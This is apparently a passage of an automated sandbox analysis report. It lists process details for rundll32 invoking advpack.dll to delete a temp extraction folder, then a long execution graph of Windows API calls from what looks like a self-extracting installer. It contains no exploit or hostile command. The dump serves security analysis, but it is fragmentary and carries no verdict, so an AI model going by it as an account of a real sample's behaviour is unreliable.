                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                  Start time:21:18:20
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                  Imagebase:0x7ff6e8c60000
                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:28.6%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:26.8%
                                                                                                                                                                                                    Total number of Nodes:959
                                                                                                                                                                                                    Total number of Limit Nodes:24
                                                                                                                                                                                                    execution_graph 2196 174ad0 2204 173680 2196->2204 2199 174aee WriteFile 2201 174b14 2199->2201 2202 174b0f 2199->2202 2200 174ae9 2201->2202 2203 174b3b SendDlgItemMessageA 2201->2203 2203->2202 2205 173691 MsgWaitForMultipleObjects 2204->2205 2206 1736a9 PeekMessageA 2205->2206 2207 1736e8 2205->2207 2206->2205 2208 1736bc 2206->2208 2207->2199 2207->2200 2208->2205 2208->2207 2209 1736c7 DispatchMessageA 2208->2209 2210 1736d1 PeekMessageA 2208->2210 2209->2210 2210->2208 2211 174cd0 2212 174cf4 2211->2212 2213 174d0b 2211->2213 2214 174d02 2212->2214 2215 174b60 FindCloseChangeNotification 2212->2215 2213->2214 2217 174dcb 2213->2217 2220 174d25 2213->2220 2268 176ce0 2214->2268 2215->2214 2218 174dd4 SetDlgItemTextA 2217->2218 2221 174de3 2217->2221 2218->2221 2219 174e95 2220->2214 2234 174c37 2220->2234 2221->2214 2242 17476d 2221->2242 2224 174e38 2224->2214 2251 174980 2224->2251 2230 174e64 2259 1747e0 LocalAlloc 2230->2259 2233 174e6f 2233->2214 2235 174c88 2234->2235 2236 174c4c DosDateTimeToFileTime 2234->2236 2235->2214 2239 174b60 2235->2239 2236->2235 2237 174c5e LocalFileTimeToFileTime 2236->2237 2237->2235 2238 174c70 SetFileTime 2237->2238 2238->2235 2240 174b76 SetFileAttributesA 2239->2240 2241 174b92 FindCloseChangeNotification 2239->2241 2240->2214 2241->2240 2273 1766ae GetFileAttributesA 2242->2273 2244 17477b 2244->2224 2245 1747cc SetFileAttributesA 2246 1747db 2245->2246 2246->2224 2250 1747c2 2250->2245 2252 174990 2251->2252 2253 1749a5 2252->2253 2254 1749c2 lstrcmpA 2252->2254 2257 1744b9 20 API calls 2253->2257 2255 1749ba 2254->2255 2256 174a0e 2254->2256 2255->2214 2255->2230 2256->2255 2339 17487a 2256->2339 2257->2255 2260 1747f6 2259->2260 2261 17480f LocalAlloc 2259->2261 2262 1744b9 20 API calls 2260->2262 2264 174831 2261->2264 2267 17480b 2261->2267 2262->2267 2265 1744b9 20 API calls 2264->2265 2266 174846 LocalFree 2265->2266 2266->2267 2267->2233 2269 176ce8 2268->2269 2270 176ceb 2268->2270 2269->2219 2352 176cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2270->2352 2272 176e26 2272->2219 2274 174777 2273->2274 2274->2244 2274->2245 2275 176517 FindResourceA 2274->2275 2276 176536 LoadResource 2275->2276 2277 17656b 2275->2277 2276->2277 2278 176544 DialogBoxIndirectParamA FreeResource 2276->2278 2282 1744b9 2277->2282 2278->2277 2281 1747b1 2278->2281 2281->2245 2281->2246 2281->2250 2283 1744fe LoadStringA 2282->2283 2284 17455a 2282->2284 2285 174527 2283->2285 2286 174562 2283->2286 2288 176ce0 4 API calls 2284->2288 2287 17681f 10 API calls 2285->2287 2292 17457e LocalAlloc 2286->2292 2293 1745c9 2286->2293 2289 17452c 2287->2289 2290 174689 2288->2290 2291 174536 MessageBoxA 2289->2291 2323 1767c9 2289->2323 2290->2281 2291->2284 2292->2284 2303 1745af 2292->2303 2295 174607 LocalAlloc 2293->2295 2296 1745cd LocalAlloc 2293->2296 2295->2284 2299 1745c4 2295->2299 2296->2284 2301 1745f3 2296->2301 2302 17462d MessageBeep 2299->2302 2304 17171e _vsnprintf 2301->2304 2311 17681f 2302->2311 2329 17171e 2303->2329 2304->2299 2308 174645 MessageBoxA LocalFree 2308->2284 2309 1767c9 EnumResourceLanguagesA 2309->2308 2312 176857 GetVersionExA 2311->2312 2313 176940 2311->2313 2315 17687c 2312->2315 2322 17691a 2312->2322 2314 176ce0 4 API calls 2313->2314 2316 17463b 2314->2316 2317 1768a5 GetSystemMetrics 2315->2317 2315->2322 2316->2308 2316->2309 2318 1768b5 RegOpenKeyExA 2317->2318 2317->2322 2319 1768d6 RegQueryValueExA RegCloseKey 2318->2319 2318->2322 2320 17690c 2319->2320 2319->2322 2333 1766f9 2320->2333 2322->2313 2324 176803 2323->2324 2325 1767e2 2323->2325 2324->2291 2337 176793 EnumResourceLanguagesA 2325->2337 2327 1767f5 2327->2324 2338 176793 EnumResourceLanguagesA 2327->2338 2330 17172d 2329->2330 2331 17173d _vsnprintf 2330->2331 2332 17175d 2330->2332 2331->2332 2332->2299 2334 17670f 2333->2334 2335 176740 CharNextA 2334->2335 2336 17674b 2334->2336 2335->2334 2336->2322 2337->2327 2338->2324 2340 1748a2 CreateFileA 2339->2340 2342 1748e9 2340->2342 2343 174908 2340->2343 2342->2343 2344 1748ee 2342->2344 2343->2255 2347 17490c 2344->2347 2348 1748f5 CreateFileA 2347->2348 2350 174917 2347->2350 2348->2343 2349 174962 CharNextA 2349->2350 2350->2348 2350->2349 2351 174953 CreateDirectoryA 2350->2351 2351->2349 2352->2272 3119 173210 3120 173227 3119->3120 3142 17328e EndDialog 3119->3142 3121 173235 3120->3121 3122 1733e2 GetDesktopWindow 3120->3122 3126 1732dd GetDlgItemTextA 3121->3126 3127 17324c 3121->3127 3135 173239 3121->3135 3172 1743d0 6 API calls 3122->3172 3129 1732fc 3126->3129 3152 173366 3126->3152 3130 1732c5 EndDialog 3127->3130 3131 173251 3127->3131 3128 17341f GetDlgItem EnableWindow 3128->3135 3137 173331 GetFileAttributesA 3129->3137 3129->3152 3130->3135 3132 17325c LoadStringA 3131->3132 3131->3135 3134 173294 3132->3134 3144 17327b 3132->3144 3133 1744b9 20 API calls 3133->3135 3157 174224 LoadLibraryA 3134->3157 3140 17333f 3137->3140 3141 17337c 3137->3141 3138 1744b9 20 API calls 3138->3142 3146 1744b9 20 API calls 3140->3146 3145 17658a CharPrevA 3141->3145 3142->3135 3143 1732a5 SetDlgItemTextA 3143->3135 3143->3144 3144->3138 3147 17338d 3145->3147 3148 173351 3146->3148 3149 1758c8 27 API calls 3147->3149 3148->3135 3150 17335a CreateDirectoryA 3148->3150 3151 173394 3149->3151 3150->3141 3150->3152 3151->3152 3153 1733a4 3151->3153 3152->3133 3154 1733c7 EndDialog 3153->3154 3155 17597d 34 API calls 3153->3155 3154->3135 3156 1733c3 3155->3156 3156->3135 3156->3154 3158 174246 GetProcAddress 3157->3158 3159 1743b2 3157->3159 3160 1743a4 FreeLibrary 3158->3160 3161 17425d GetProcAddress 3158->3161 3163 1744b9 20 API calls 3159->3163 3160->3159 3161->3160 3162 174274 GetProcAddress 3161->3162 3162->3160 3164 17428b 3162->3164 3165 17329d 3163->3165 3166 174295 GetTempPathA 3164->3166 3171 1742e1 3164->3171 3165->3135 3165->3143 3167 1742ad 3166->3167 3167->3167 3168 1742b4 CharPrevA 3167->3168 3169 1742d0 CharPrevA 3168->3169 3168->3171 3169->3171 3170 174390 FreeLibrary 3170->3165 3171->3170 3174 174463 SetWindowPos 3172->3174 3175 176ce0 4 API calls 3174->3175 3176 1733f1 SetWindowTextA SendDlgItemMessageA 3175->3176 3176->3128 3176->3135 3177 173450 3178 1734d3 EndDialog 3177->3178 3179 17345e 3177->3179 3180 17346a 3178->3180 3181 173465 3179->3181 3182 17349a GetDesktopWindow 3179->3182 3181->3180 3185 17348c EndDialog 3181->3185 3183 1743d0 11 API calls 3182->3183 3184 1734ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3183->3184 3184->3180 3185->3180 3186 174a50 3187 174a66 3186->3187 3188 174a9f ReadFile 3186->3188 3189 174abb 3187->3189 3190 174a82 memcpy 3187->3190 3188->3189 3190->3189 3191 176c03 3192 176c17 _exit 3191->3192 3193 176c1e 3191->3193 3192->3193 3194 176c27 _cexit 3193->3194 3195 176c32 3193->3195 3194->3195 2353 176f40 SetUnhandledExceptionFilter 2354 174cc0 GlobalFree 3196 174200 3197 17421e 3196->3197 3198 17420b SendMessageA 3196->3198 3198->3197 3199 173100 3200 1731b0 3199->3200 3202 173111 3199->3202 3201 1731b9 SendDlgItemMessageA 3200->3201 3204 173141 3200->3204 3201->3204 3205 17311d 3202->3205 3206 173149 GetDesktopWindow 3202->3206 3203 173138 EndDialog 3203->3204 3205->3203 3205->3204 3207 1743d0 11 API calls 3206->3207 3208 17315d 6 API calls 3207->3208 3208->3204 3209 174bc0 3211 174c05 3209->3211 3212 174bd7 3209->3212 3210 174c1b SetFilePointer 3210->3212 3211->3210 3211->3212 3213 1730c0 3214 1730de CallWindowProcA 3213->3214 3215 1730ce 3213->3215 3216 1730da 3214->3216 3215->3214 3215->3216 3217 1763c0 3218 176407 3217->3218 3219 17658a CharPrevA 3218->3219 3220 176415 CreateFileA 3219->3220 3221 17643a 3220->3221 3222 176448 WriteFile 3220->3222 3225 176ce0 4 API calls 3221->3225 3223 176465 CloseHandle 3222->3223 3223->3221 3226 17648f 3225->3226 3227 177270 _except_handler4_common 3228 1769b0 3229 1769b5 3228->3229 3237 176fbe GetModuleHandleW 3229->3237 3231 1769c1 __set_app_type __p__fmode __p__commode 3232 1769f9 3231->3232 3233 176a02 __setusermatherr 3232->3233 3234 176a0e 3232->3234 3233->3234 3239 1771ef _controlfp 3234->3239 3236 176a13 3238 176fcf 3237->3238 3238->3231 3239->3236 3240 1734f0 3241 173504 3240->3241 3242 1735b8 3240->3242 3241->3242 3243 1735be GetDesktopWindow 3241->3243 3244 17351b 3241->3244 3245 173526 3242->3245 3246 173671 EndDialog 3242->3246 3247 1743d0 11 API calls 3243->3247 3248 17354f 3244->3248 3249 17351f 3244->3249 3246->3245 3250 1735d6 3247->3250 3248->3245 3252 173559 ResetEvent 3248->3252 3249->3245 3251 17352d TerminateThread EndDialog 3249->3251 3253 1735e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3250->3253 3254 17361d SetWindowTextA CreateThread 3250->3254 3251->3245 3255 1744b9 20 API calls 3252->3255 3253->3254 3254->3245 3256 173646 3254->3256 3257 173581 3255->3257 3259 1744b9 20 API calls 3256->3259 3258 17359b SetEvent 3257->3258 3260 17358a SetEvent 3257->3260 3261 173680 4 API calls 3258->3261 3259->3242 3260->3245 3261->3242 3262 176ef0 3263 176f2d 3262->3263 3265 176f02 3262->3265 3264 176f27 ?terminate@ 3264->3263 3265->3263 3265->3264 2355 174ca0 GlobalAlloc 2356 176a60 2373 177155 2356->2373 2358 176a65 2359 176a76 GetStartupInfoW 2358->2359 2360 176a93 2359->2360 2361 176aa8 2360->2361 2362 176aaf Sleep 2360->2362 2363 176ac7 _amsg_exit 2361->2363 2365 176ad1 2361->2365 2362->2360 2363->2365 2364 176b13 _initterm 2368 176b2e __IsNonwritableInCurrentImage 2364->2368 2365->2364 2366 176af4 2365->2366 2365->2368 2367 176bd6 _ismbblead 2367->2368 2368->2367 2369 176c1e 2368->2369 2372 176bbe exit 2368->2372 2378 172bfb GetVersion 2368->2378 2369->2366 2371 176c27 _cexit 2369->2371 2371->2366 2372->2368 2374 17717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2374 2375 17717a 2373->2375 2377 1771cd 2374->2377 2375->2374 2376 1771e2 2375->2376 2376->2358 2377->2376 2379 172c50 2378->2379 2380 172c0f 2378->2380 2395 172caa memset memset memset 2379->2395 2380->2379 2382 172c13 GetModuleHandleW 2380->2382 2382->2379 2384 172c22 GetProcAddress 2382->2384 2384->2379 2392 172c34 2384->2392 2385 172c8e 2387 172c97 CloseHandle 2385->2387 2388 172c9e 2385->2388 2387->2388 2388->2368 2392->2379 2393 172c89 2489 171f90 2393->2489 2506 17468f FindResourceA SizeofResource 2395->2506 2398 172ef3 2401 1744b9 20 API calls 2398->2401 2399 172d2d CreateEventA SetEvent 2400 17468f 7 API calls 2399->2400 2403 172d57 2400->2403 2402 172d6e 2401->2402 2407 176ce0 4 API calls 2402->2407 2404 172d5b 2403->2404 2406 172e1f 2403->2406 2409 17468f 7 API calls 2403->2409 2405 1744b9 20 API calls 2404->2405 2405->2402 2511 175c9e 2406->2511 2410 172c62 2407->2410 2412 172d9f 2409->2412 2410->2385 2436 172f1d 2410->2436 2412->2404 2415 172da3 CreateMutexA 2412->2415 2413 172e30 2413->2398 2414 172e3a 2416 172e43 2414->2416 2417 172e52 FindResourceA 2414->2417 2415->2406 2418 172dbd GetLastError 2415->2418 2537 172390 2416->2537 2421 172e64 LoadResource 2417->2421 2422 172e6e 2417->2422 2418->2406 2420 172dca 2418->2420 2424 172dd5 2420->2424 2425 172dea 2420->2425 2421->2422 2423 172e4d 2422->2423 2552 1736ee GetVersionExA 2422->2552 2423->2402 2426 1744b9 20 API calls 2424->2426 2427 1744b9 20 API calls 2425->2427 2428 172de8 2426->2428 2429 172dff 2427->2429 2431 172e04 CloseHandle 2428->2431 2429->2406 2429->2431 2431->2402 2435 176517 24 API calls 2435->2423 2437 172f3f 2436->2437 2438 172f6c 2436->2438 2440 172f5f 2437->2440 2641 1751e5 2437->2641 2660 175164 2438->2660 2788 173a3f 2440->2788 2442 172f71 2445 17303c 2442->2445 2673 1755a0 2442->2673 2449 176ce0 4 API calls 2445->2449 2450 172c6b 2449->2450 2476 1752b6 2450->2476 2451 172f86 GetSystemDirectoryA 2452 17658a CharPrevA 2451->2452 2453 172fab LoadLibraryA 2452->2453 2454 172ff7 FreeLibrary 2453->2454 2455 172fc0 GetProcAddress 2453->2455 2456 173017 SetCurrentDirectoryA 2454->2456 2457 173006 2454->2457 2455->2454 2458 172fd6 DecryptFileA 2455->2458 2459 173026 2456->2459 2460 173054 2456->2460 2457->2456 2721 17621e GetWindowsDirectoryA 2457->2721 2458->2454 2465 172ff0 2458->2465 2464 1744b9 20 API calls 2459->2464 2462 173061 2460->2462 2731 173b26 2460->2731 2462->2445 2467 17307a 2462->2467 2740 17256d 2462->2740 2469 173037 2464->2469 2465->2454 2472 173098 2467->2472 2751 173ba2 2467->2751 2807 176285 GetLastError 2469->2807 2472->2445 2473 1730af 2472->2473 2809 174169 2473->2809 2477 1752d6 2476->2477 2485 175316 2476->2485 2478 175300 LocalFree LocalFree 2477->2478 2480 1752eb SetFileAttributesA DeleteFileA 2477->2480 2478->2477 2478->2485 2479 17538c 2482 176ce0 4 API calls 2479->2482 2480->2478 2481 175374 2481->2479 3115 171fe1 2481->3115 2484 172c72 2482->2484 2484->2385 2484->2393 2485->2481 2486 17535e SetCurrentDirectoryA 2485->2486 2487 1765e8 4 API calls 2485->2487 2488 172390 13 API calls 2486->2488 2487->2486 2488->2481 2490 171f9f 2489->2490 2491 171f9a 2489->2491 2493 171fc0 2490->2493 2496 1744b9 20 API calls 2490->2496 2497 171fd9 2490->2497 2492 171ea7 15 API calls 2491->2492 2492->2490 2494 171fcf ExitWindowsEx 2493->2494 2495 171ee2 GetCurrentProcess OpenProcessToken 2493->2495 2493->2497 2494->2497 2499 171f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2500 171f0e 2495->2500 2496->2493 2497->2385 2499->2500 2501 171f6b ExitWindowsEx 2499->2501 2503 1744b9 20 API calls 2500->2503 2501->2500 2502 171f1f 2501->2502 2504 176ce0 4 API calls 2502->2504 2503->2502 2505 171f8c 2504->2505 2505->2385 2507 1746b6 2506->2507 2509 172d1a 2506->2509 2508 1746be FindResourceA LoadResource LockResource 2507->2508 2507->2509 2508->2509 2510 1746df memcpy_s FreeResource 2508->2510 2509->2398 2509->2399 2510->2509 2517 175e17 2511->2517 2534 175cc3 2511->2534 2512 175dd0 2516 175dec GetModuleFileNameA 2512->2516 2512->2517 2513 176ce0 4 API calls 2515 172e2c 2513->2515 2514 175ced CharNextA 2514->2534 2515->2413 2515->2414 2516->2517 2518 175e0a 2516->2518 2517->2513 2587 1766c8 2518->2587 2520 176218 2596 176e2a 2520->2596 2523 175e36 CharUpperA 2524 1761d0 2523->2524 2523->2534 2525 1744b9 20 API calls 2524->2525 2526 1761e7 2525->2526 2527 1761f7 ExitProcess 2526->2527 2528 1761f0 CloseHandle 2526->2528 2528->2527 2529 175f9f CharUpperA 2529->2534 2530 176003 CharUpperA 2530->2534 2531 175f59 CompareStringA 2531->2534 2532 175edc CharUpperA 2532->2534 2533 1760a2 CharUpperA 2533->2534 2534->2512 2534->2514 2534->2517 2534->2520 2534->2523 2534->2529 2534->2530 2534->2531 2534->2532 2534->2533 2535 17667f IsDBCSLeadByte CharNextA 2534->2535 2592 17658a 2534->2592 2535->2534 2538 1724cb 2537->2538 2541 1723b9 2537->2541 2539 176ce0 4 API calls 2538->2539 2540 1724dc 2539->2540 2540->2423 2541->2538 2542 1723e9 FindFirstFileA 2541->2542 2542->2538 2543 172407 2542->2543 2544 172421 lstrcmpA 2543->2544 2545 172479 2543->2545 2547 1724a9 FindNextFileA 2543->2547 2550 17658a CharPrevA 2543->2550 2551 172390 5 API calls 2543->2551 2546 172431 lstrcmpA 2544->2546 2544->2547 2548 172488 SetFileAttributesA DeleteFileA 2545->2548 2546->2543 2546->2547 2547->2543 2549 1724bd FindClose RemoveDirectoryA 2547->2549 2548->2547 2549->2538 2550->2543 2551->2543 2557 173737 2552->2557 2558 17372d 2552->2558 2553 1744b9 20 API calls 2554 1739fc 2553->2554 2555 176ce0 4 API calls 2554->2555 2556 172e92 2555->2556 2556->2402 2556->2423 2567 1718a3 2556->2567 2557->2554 2557->2558 2560 1738a4 2557->2560 2603 1728e8 2557->2603 2558->2553 2558->2554 2560->2554 2560->2558 2561 1739c1 MessageBeep 2560->2561 2562 17681f 10 API calls 2561->2562 2563 1739ce 2562->2563 2564 1739d8 MessageBoxA 2563->2564 2565 1767c9 EnumResourceLanguagesA 2563->2565 2564->2554 2565->2564 2568 1718d5 2567->2568 2569 1719b8 2567->2569 2632 1717ee LoadLibraryA 2568->2632 2571 176ce0 4 API calls 2569->2571 2573 1719d5 2571->2573 2573->2423 2573->2435 2574 1718e5 GetCurrentProcess OpenProcessToken 2574->2569 2575 171900 GetTokenInformation 2574->2575 2576 1719aa CloseHandle 2575->2576 2577 171918 GetLastError 2575->2577 2576->2569 2577->2576 2578 171927 LocalAlloc 2577->2578 2579 1719a9 2578->2579 2580 171938 GetTokenInformation 2578->2580 2579->2576 2581 1719a2 LocalFree 2580->2581 2582 17194e AllocateAndInitializeSid 2580->2582 2581->2579 2582->2581 2585 17196e 2582->2585 2583 171999 FreeSid 2583->2581 2584 171975 EqualSid 2584->2585 2586 17198c 2584->2586 2585->2583 2585->2584 2585->2586 2586->2583 2591 1766d5 2587->2591 2588 1766f3 2588->2517 2590 1766e5 CharNextA 2590->2591 2591->2588 2591->2590 2599 176648 2591->2599 2593 17659b 2592->2593 2593->2593 2594 1765ab 2593->2594 2595 1765b8 CharPrevA 2593->2595 2594->2534 2595->2594 2602 176cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 17621d 2600 17665d IsDBCSLeadByte 2599->2600 2601 176668 2599->2601 2600->2601 2601->2591 2602->2598 2604 172a62 2603->2604 2611 17290d 2603->2611 2605 172a75 2604->2605 2606 172a6e GlobalFree 2604->2606 2605->2560 2606->2605 2608 172955 GlobalAlloc 2608->2604 2609 172968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 172a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 172a80 GlobalUnlock 2611->2612 2613 172773 2611->2613 2612->2604 2614 1727a3 CharUpperA CharNextA CharNextA 2613->2614 2615 1728b2 2613->2615 2616 1728b7 GetSystemDirectoryA 2614->2616 2617 1727db 2614->2617 2615->2616 2620 1728bf 2616->2620 2618 1727e3 2617->2618 2619 1728a8 GetWindowsDirectoryA 2617->2619 2624 17658a CharPrevA 2618->2624 2619->2620 2621 1728d2 2620->2621 2622 17658a CharPrevA 2620->2622 2623 176ce0 4 API calls 2621->2623 2622->2621 2625 1728e2 2623->2625 2626 172810 RegOpenKeyExA 2624->2626 2625->2611 2626->2620 2627 172837 RegQueryValueExA 2626->2627 2628 17285c 2627->2628 2629 17289a RegCloseKey 2627->2629 2630 172867 ExpandEnvironmentStringsA 2628->2630 2631 17287a 2628->2631 2629->2620 2630->2631 2631->2629 2633 171826 GetProcAddress 2632->2633 2634 171890 2632->2634 2635 171889 FreeLibrary 2633->2635 2636 171839 AllocateAndInitializeSid 2633->2636 2637 176ce0 4 API calls 2634->2637 2635->2634 2636->2635 2640 17185f FreeSid 2636->2640 2638 17189f 2637->2638 2638->2569 2638->2574 2640->2635 2642 17468f 7 API calls 2641->2642 2643 1751f9 LocalAlloc 2642->2643 2644 17522d 2643->2644 2645 17520d 2643->2645 2646 17468f 7 API calls 2644->2646 2647 1744b9 20 API calls 2645->2647 2648 17523a 2646->2648 2649 17521e 2647->2649 2650 175262 lstrcmpA 2648->2650 2651 17523e 2648->2651 2652 176285 GetLastError 2649->2652 2654 175272 LocalFree 2650->2654 2655 17527e 2650->2655 2653 1744b9 20 API calls 2651->2653 2657 172f4d 2652->2657 2656 17524f LocalFree 2653->2656 2654->2657 2658 1744b9 20 API calls 2655->2658 2656->2657 2657->2438 2657->2440 2657->2445 2659 175290 LocalFree 2658->2659 2659->2657 2661 17468f 7 API calls 2660->2661 2662 175175 2661->2662 2663 17517a 2662->2663 2664 1751af 2662->2664 2665 1744b9 20 API calls 2663->2665 2666 17468f 7 API calls 2664->2666 2667 17518d 2665->2667 2668 1751c0 2666->2668 2667->2442 2822 176298 2668->2822 2671 1751e1 2671->2442 2672 1744b9 20 API calls 2672->2667 2674 17468f 7 API calls 2673->2674 2675 1755c7 LocalAlloc 2674->2675 2676 1755fd 2675->2676 2677 1755db 2675->2677 2678 17468f 7 API calls 2676->2678 2679 1744b9 20 API calls 2677->2679 2680 17560a 2678->2680 2681 1755ec 2679->2681 2682 175632 lstrcmpA 2680->2682 2683 17560e 2680->2683 2684 176285 GetLastError 2681->2684 2686 175645 2682->2686 2687 17564b LocalFree 2682->2687 2685 1744b9 20 API calls 2683->2685 2709 1755f1 2684->2709 2688 17561f LocalFree 2685->2688 2686->2687 2689 175696 2687->2689 2690 17565b 2687->2690 2688->2709 2691 17589f 2689->2691 2694 1756ae GetTempPathA 2689->2694 2698 175467 49 API calls 2690->2698 2692 176517 24 API calls 2691->2692 2692->2709 2693 176ce0 4 API calls 2695 172f7e 2693->2695 2696 1756eb 2694->2696 2697 1756c3 2694->2697 2695->2445 2695->2451 2703 175717 GetDriveTypeA 2696->2703 2704 17586c GetWindowsDirectoryA 2696->2704 2696->2709 2834 175467 2697->2834 2699 175678 2698->2699 2702 1744b9 20 API calls 2699->2702 2699->2709 2702->2709 2705 175730 GetFileAttributesA 2703->2705 2719 17572b 2703->2719 2868 17597d GetCurrentDirectoryA SetCurrentDirectoryA 2704->2868 2705->2719 2709->2693 2710 175467 49 API calls 2710->2696 2711 172630 21 API calls 2711->2719 2713 1757c1 GetWindowsDirectoryA 2713->2719 2714 17597d 34 API calls 2714->2719 2715 17658a CharPrevA 2716 1757e8 GetFileAttributesA 2715->2716 2717 1757fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 175827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2705 2719->2709 2719->2711 2719->2713 2719->2714 2719->2715 2719->2718 2720 175467 49 API calls 2719->2720 2864 176952 2719->2864 2720->2719 2722 176249 2721->2722 2723 176268 2721->2723 2724 1744b9 20 API calls 2722->2724 2725 17597d 34 API calls 2723->2725 2726 17625a 2724->2726 2727 17625f 2725->2727 2728 176285 GetLastError 2726->2728 2729 176ce0 4 API calls 2727->2729 2728->2727 2730 173013 2729->2730 2730->2445 2730->2456 2733 173b2d 2731->2733 2732 173b72 2934 174fe0 2732->2934 2733->2732 2734 173b53 2733->2734 2736 176517 24 API calls 2734->2736 2737 173b70 2736->2737 2738 176298 10 API calls 2737->2738 2739 173b7b 2737->2739 2738->2739 2739->2462 2741 172583 2740->2741 2742 172622 2740->2742 2744 17258b 2741->2744 2745 1725e8 RegOpenKeyExA 2741->2745 2961 1724e0 GetWindowsDirectoryA 2742->2961 2746 1725e3 2744->2746 2749 17259b RegOpenKeyExA 2744->2749 2745->2746 2747 172609 RegQueryInfoKeyA 2745->2747 2746->2467 2748 1725d1 RegCloseKey 2747->2748 2748->2746 2749->2746 2750 1725bc RegQueryValueExA 2749->2750 2750->2748 2752 173bdb 2751->2752 2768 173bec 2751->2768 2754 17468f 7 API calls 2752->2754 2753 173c03 memset 2753->2768 2754->2768 2755 173d13 2757 1744b9 20 API calls 2755->2757 2756 17468f 7 API calls 2756->2768 2763 173d26 2757->2763 2759 176ce0 4 API calls 2760 173f60 2759->2760 2760->2472 2761 173d7b CompareStringA 2762 173fd7 2761->2762 2761->2768 2762->2763 3060 172267 2762->3060 2763->2759 2764 173fab 2767 1744b9 20 API calls 2764->2767 2770 173fbe LocalFree 2767->2770 2768->2753 2768->2755 2768->2756 2768->2761 2768->2762 2768->2763 2768->2764 2771 173f46 LocalFree 2768->2771 2772 173f1e LocalFree 2768->2772 2774 173cc7 CompareStringA 2768->2774 2785 173e10 2768->2785 2969 171ae8 2768->2969 3010 17202a memset memset RegCreateKeyExA 2768->3010 3036 173fef 2768->3036 2770->2763 2771->2763 2772->2762 2772->2768 2774->2768 2775 173f92 2778 1744b9 20 API calls 2775->2778 2776 173e1f GetProcAddress 2777 173f64 2776->2777 2776->2785 2779 1744b9 20 API calls 2777->2779 2780 173fa9 2778->2780 2781 173f75 FreeLibrary 2779->2781 2782 173f7c LocalFree 2780->2782 2781->2782 2783 176285 GetLastError 2782->2783 2784 173f8b 2783->2784 2784->2763 2785->2775 2785->2776 2786 173f40 FreeLibrary 2785->2786 2787 173eff FreeLibrary 2785->2787 3050 176495 2785->3050 2786->2771 2787->2772 2789 17468f 7 API calls 2788->2789 2790 173a55 LocalAlloc 2789->2790 2791 173a8e 2790->2791 2792 173a6c 2790->2792 2794 17468f 7 API calls 2791->2794 2793 1744b9 20 API calls 2792->2793 2795 173a7d 2793->2795 2796 173a98 2794->2796 2797 176285 GetLastError 2795->2797 2798 173ac5 lstrcmpA 2796->2798 2799 173a9c 2796->2799 2805 172f64 2797->2805 2801 173b0d LocalFree 2798->2801 2802 173ada 2798->2802 2800 1744b9 20 API calls 2799->2800 2803 173aad LocalFree 2800->2803 2801->2805 2804 176517 24 API calls 2802->2804 2803->2805 2806 173aec LocalFree 2804->2806 2805->2438 2805->2445 2806->2805 2808 17628f 2807->2808 2808->2445 2810 17468f 7 API calls 2809->2810 2811 17417d LocalAlloc 2810->2811 2812 174195 2811->2812 2813 1741a8 2811->2813 2814 1744b9 20 API calls 2812->2814 2815 17468f 7 API calls 2813->2815 2816 1741a6 2814->2816 2817 1741b5 2815->2817 2816->2445 2818 1741c5 lstrcmpA 2817->2818 2819 1741b9 2817->2819 2818->2819 2820 1741e6 LocalFree 2818->2820 2821 1744b9 20 API calls 2819->2821 2820->2816 2821->2820 2823 17171e _vsnprintf 2822->2823 2824 1762c9 FindResourceA 2823->2824 2826 176353 2824->2826 2827 1762cb LoadResource LockResource 2824->2827 2828 176ce0 4 API calls 2826->2828 2827->2826 2830 1762e0 2827->2830 2829 1751ca 2828->2829 2829->2671 2829->2672 2831 176355 FreeResource 2830->2831 2832 17631b FreeResource 2830->2832 2831->2826 2833 17171e _vsnprintf 2832->2833 2833->2824 2835 17548a 2834->2835 2837 17551a 2834->2837 2894 1753a1 2835->2894 2905 1758c8 2837->2905 2838 175581 2842 176ce0 4 API calls 2838->2842 2841 175495 2841->2838 2847 1754c2 GetSystemInfo 2841->2847 2848 17550c 2841->2848 2849 17559a 2842->2849 2843 17554d 2843->2838 2850 17597d 34 API calls 2843->2850 2844 17553b CreateDirectoryA 2845 175577 2844->2845 2846 175547 2844->2846 2851 176285 GetLastError 2845->2851 2846->2843 2855 1754da 2847->2855 2852 17658a CharPrevA 2848->2852 2849->2709 2858 172630 GetWindowsDirectoryA 2849->2858 2853 17555c 2850->2853 2854 17557c 2851->2854 2852->2837 2853->2838 2857 175568 RemoveDirectoryA 2853->2857 2854->2838 2855->2848 2856 17658a CharPrevA 2855->2856 2856->2848 2857->2838 2859 17266f 2858->2859 2860 17265e 2858->2860 2862 176ce0 4 API calls 2859->2862 2861 1744b9 20 API calls 2860->2861 2861->2859 2863 172687 2862->2863 2863->2696 2863->2710 2865 1769a1 2864->2865 2866 17696e GetDiskFreeSpaceA 2864->2866 2865->2719 2866->2865 2867 176989 MulDiv 2866->2867 2867->2865 2869 1759dd GetDiskFreeSpaceA 2868->2869 2870 1759bb 